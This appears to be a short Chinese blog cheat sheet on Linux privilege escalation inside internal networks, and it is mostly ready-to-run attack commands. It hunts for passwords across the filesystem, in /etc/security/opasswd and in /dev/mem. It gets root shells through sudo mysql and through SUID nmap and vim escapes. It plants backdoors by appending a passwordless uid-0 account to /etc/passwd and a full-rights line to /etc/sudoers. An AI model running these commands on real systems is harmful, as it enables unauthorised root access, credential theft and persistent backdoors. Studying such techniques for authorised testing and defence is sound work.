内网的Linux提权基础"/>
内网的Linux提权基础
Linux 提权
目的 user -> root
提权手法
密码相关
-
查看带有密码的文件
grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
-
查看过期密码
权限要求比较高
cat /etc/security/opasswd
-
用户最后编辑的文件
find / -mmin -10 2>/dev/null | grep -Ev "^/proc"
-
查看内存中密码
同样要求高权限
strings /dev/mem -n10 |grep -i pass
-
查看敏感文件
locate password | more
计划任务
-
查看计划任务
cat /var/log/cronlog
-
编辑计划任务
/etc/crontab
内核漏洞
- 查看版本
-
exp
Linux_Exploit_Suggester-master
-
思路
一般是找到一个c文件然后直接执行得到权限
sudo提权
sudo -l
查看当前权限
第一个 ALL 指示允许从任何终端、机器访问sudo
第二个 (ALL)指示sudo命令被允许以任何用户身份执行
第三个 ALL 表示所有命令都可以作为root执行
-
如果只显示一个mysql的话,使用
sudo mysql -e '\! /bin/sh'
来获取一个shell
suid提权
-
查看文件
find / -user root -perm -4000 -print 2>/dev/null
-
常见程序
-
nmap 2.02 ->5.21
nmap > !sh
-
vim
vim -c '!sh'
-
GTFOBins
利用可写文件
-
/etc/passwd
echo 'user:0:0::/root:/bin/bash'>>/etc/passwd
-
/etc/sudoers
echo 'user ALL=(ALL:ALL) ALL'>>/etc/sudoers
敏感组
- docker
更多推荐
内网的Linux提权基础
发布评论